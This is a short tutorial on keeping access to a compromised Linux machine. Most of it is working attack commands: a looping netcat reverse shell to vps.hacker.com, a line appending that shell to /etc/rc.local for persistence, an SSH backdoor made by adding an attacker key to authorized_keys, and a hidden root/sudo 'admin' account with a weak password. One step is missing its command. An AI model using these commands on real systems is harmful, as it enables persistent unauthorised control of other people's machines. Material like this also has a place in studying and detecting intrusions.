In this article we will describe some post-exploitation techniques allowing us to maintain our access to a Linux box.
Reverse shell
A reverse shell is neither discrete nor elegant, however it allow for quick backdoor access to the box.
Moreover, it does not require the machine to be visible on Internet, which can be useful if it is behind a NAT or a firewall.
Launch a connection to the attack server from our compromised machine:
|
root@compromised$ /bin/sh -c "while [ 1 ];do rm /tmp/f;mkfifo /tmp/f;/bin/bash < /tmp/f 2>&1 |nc vps.hacker.com 8080 > /tmp/f;sleep 10;done" |
This one-liner will try to open a shell to vps.hacker.com:8080 every 10 seconds.
We need a listener on the attacking server:
|
root@vps.hacker.com$ nc -lvp 8080 |
After some time, the shell is executed !
|
root@vps.hacker.com$ nc -lvp 8080 listening on [any] 8080 ... connect to [10.0.0.1] from root@compromised [10.0.0.2] 24021 id uid=0(root) gid=0(root) groups=0(root) |
We can then put the reverse shell one-liner in rc.local or bashrc for cross-reboot persistence.
|
root@compromised$ echo '(/bin/bash -c "while [ 1 ];do rm /tmp/ncfifo;mkfifo /tmp/ncfifo;/bin/bash < /tmp/ncfifo 2>&1 |nc vps.hacker.com 8080 > /tmp/ncfifo;sleep 10;done")&' >> /etc/rc.local |
SSH backdoor
If a SSH service is enabled on the compromised host, a simple solution could be to add our public key to the authorized_keys file . We can then connect directly through SSH.
First, generate a SSH keypair on our attacking server:
|
root@vps.hacker.com$ ssh-keygen root@vps.hacker.com$ echo .ssh/id_rsa.pub ssh-rsa AAAAB3N[...]Zf |
After which we copy the public key to the compromised host:
|
root@compromised$ echo 'ssh-rsa AAAAB3N[...]Zf' >> .ssh/authorized_keys |
We can log in anytime with:
Add user
Another solution could be to add a user. We can then use this user account to log in through SSH, FTP or any system service using local accounts on the machine.
|
root@compromised$ useradd admin --password $(echo lemmein|mkpasswd -s) --groups root,sudo |
This adds an “admin” user with password “lemmein”.